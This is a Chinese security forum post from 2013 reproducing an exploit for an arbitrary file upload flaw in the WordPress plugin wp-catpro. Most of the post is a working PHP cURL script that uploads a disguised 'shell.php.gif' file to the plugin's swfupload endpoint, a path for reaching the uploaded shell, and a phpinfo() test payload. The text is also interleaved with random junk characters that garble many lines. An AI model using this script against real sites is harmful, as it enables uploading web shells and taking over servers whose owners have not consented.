找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1944|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
3 j5 e6 s$ ]% D+ y6 p#-----------------------------------------------------------------------  s, H7 C9 I, o& e% r

, a3 \8 h/ c2 t! R- H作者  => Zikou-16  t, R4 e! P2 @& r- G7 {
邮箱 => zikou16x@gmail.com
0 K( q0 V" c' z0 p, ^# o: W* G2 ^测试系统 : Windows 7 , Backtrack 5r3) f! |7 k: Z6 P
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip  x1 |/ h9 f* A2 _- W+ s4 Y
####) p6 P' {7 }+ x) E1 \& x0 n  ^
0 I1 U, r# b7 m& c* x, I% [) o  i
#=> Exploit 信息:: a! O# E& {2 I2 k  N% }
------------------5 M+ [0 v8 ~. Y& B% S/ V7 w! R
# 攻击者可以上传 file/shell.php.gif. C+ B3 Z0 S7 l1 k/ N. k/ V
# ("jpg", "gif", "png")  // Allowed file extensions2 G- u+ t$ W9 z' A+ i
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
! z4 f" M3 F1 o  x( g& U. g* |# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
0 z5 I: }$ c6 L# I0 c* V& {------------------
% S6 q8 ]6 @& T 4 I2 ?; S3 }$ ?% {  `9 a+ ^
#=> Exploit+ M8 o& V. m. d+ v& {, i8 L
-----------
3 d& ?0 c0 w' n  q: U- W4 K<?php5 N/ \4 G. D& I2 e7 F/ E' g6 K

! m6 a6 X: q  \" `$uploadfile="zik.php.gif";5 F" R) V  k6 ~% f3 t4 `5 v& S
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");9 s2 _( J& N. u/ h7 x+ f/ g; g, M- ]1 T
curl_setopt($ch, CURLOPT_POST, true);$ A7 Y/ L; l  |" y: b; k
curl_setopt($ch, CURLOPT_POSTFIELDS,
7 t" W* g  q7 I" u- z5 i* M0 Tarray('Filedata'=>"@$uploadfile",* \; _( e4 X' Y; E& x6 F
'folder'=>'/wp-content/uploads/catpro/'));
+ x+ }. q8 O+ m1 m5 o& pcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
& Q" |" k2 E% M+ q/ j$postResult = curl_exec($ch);1 U3 S9 A: q1 y$ C$ J% L
curl_close($ch);
) u$ }+ y9 s% o # J: W) t+ K* s1 N! L2 Q! q
print "$postResult";4 h  `6 b( V5 l2 Q
8 O, a) ]9 ?: T/ `9 A" [
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif3 r& n% T/ V3 ]/ p+ D6 z
  ?>
- I8 k$ ^! G9 X  t7 {6 D<?php: p6 }* x4 B/ p) K% O
phpinfo();
# S  x( A& x& H9 w( f, O$ E?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表